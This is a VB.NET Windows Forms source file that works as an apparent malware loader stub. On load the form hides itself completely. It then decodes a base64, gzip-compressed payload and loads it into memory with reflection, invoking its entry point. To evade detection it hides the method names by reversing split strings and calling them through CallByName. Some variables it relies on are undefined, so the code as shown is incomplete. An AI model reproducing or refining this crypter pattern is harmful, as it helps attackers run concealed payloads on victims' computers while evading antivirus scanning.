Imports System.IO
Public Class Form1
Public Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
Me.Hide()
Me.ShowInTaskbar = False
Me.ShowIcon = False
Me.Opacity = 0
maloumat
Dim str2 As String = ""
Dim num3 As Integer = pp1.Length
Dim i As Integer = 1 
Do While (i <= num3) 
str2 = rahj
i += 1
Loop
Dim best = Convert.FromBase64String(UnZip(str2))
        Dim y1 As Object = StrReverse("da" & "oL")
        Dim y2 As Object = StrReverse("tniop" & "yrtnE")
        Dim y3 As Object = StrReverse("eko" & "vnI")
        Dim mayena As String = ""
        Dim f1 As Object = Rein(mayena)
        Dim f2 = CallByName(f1, y1, CallType.Method, best)
        Dim f3 = CallByName(f2, y2, CallType.Get)
        Dim f4 = CallByName(f3, y3, CallType.Method, Nothing, Nothing)
End Sub
Public Shared Function Rein(ByVal hhhh As String) As Object
        hhhh = ""
        Dim labdou As Object = AppDomain.CurrentDomain
        Return labdou
    End Function
Public Shared Function UnZip(compressedText As String) As String
        Dim gzBuffer As Byte() = Convert.FromBase64String(compressedText)
        Using ms As New MemoryStream()
            Dim msgLength As Integer = BitConverter.ToInt32(gzBuffer, 0)
            ms.Write(gzBuffer, 4, gzBuffer.Length - 4)

            Dim buffer As Byte() = New Byte(msgLength - 1) {}

            ms.Position = 0
            Using zipStream As New System.IO.Compression.GZipStream(ms, System.IO.Compression.CompressionMode.Decompress)
                zipStream.Read(buffer, 0, buffer.Length)
            End Using

            Return System.Text.Encoding.Unicode.GetString(buffer, 0, buffer.Length)
        End Using
    End Function
End Class